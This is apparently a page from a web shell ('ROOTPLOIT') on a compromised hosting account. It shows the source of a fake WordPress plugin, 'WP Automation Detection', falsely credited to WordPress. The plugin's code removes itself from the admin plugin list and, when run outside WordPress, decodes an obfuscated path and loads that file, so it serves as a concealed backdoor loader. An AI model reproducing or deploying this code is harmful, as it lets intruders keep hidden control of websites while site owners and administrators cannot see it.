ROOTPLOIT
Server: LiteSpeed
System: Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: niphet (1079)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: /home/niphet/www/wp-content/plugins/wp-automation-detection/index.php
<?php
/*
Plugin Name: WP Automation Detection
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 1.9.4
Author URI: http://wordpress.org/#
License: GPL2
*/

function exw_ukc()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $o = array('wp-automation-detection/index.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $o)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function now_smw($plugins)
{
    $e = 'wp-automation-detection/index.php';
    if (array_key_exists($e, $plugins)) {
        unset($plugins[$e]);
    }
    return $plugins;
}

function qqh($x, $g)
{
    $s = '';
    for ($f = 0; $f < strlen($x); $f += 2) {
        $b = ord($x[$f]) - 65;
        $p = ord($x[$f + 1]);
        if ($p > 90) $p -= 6;
        $h = $b * 52 + ($p - 65);
        $s .= chr($h - $g);
    }
    return $s;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'exw_ukc');
    add_filter('all_plugins', 'now_smw');
} else {
    require qqh('QOQCQKQPPDQEQUQU', 737);
}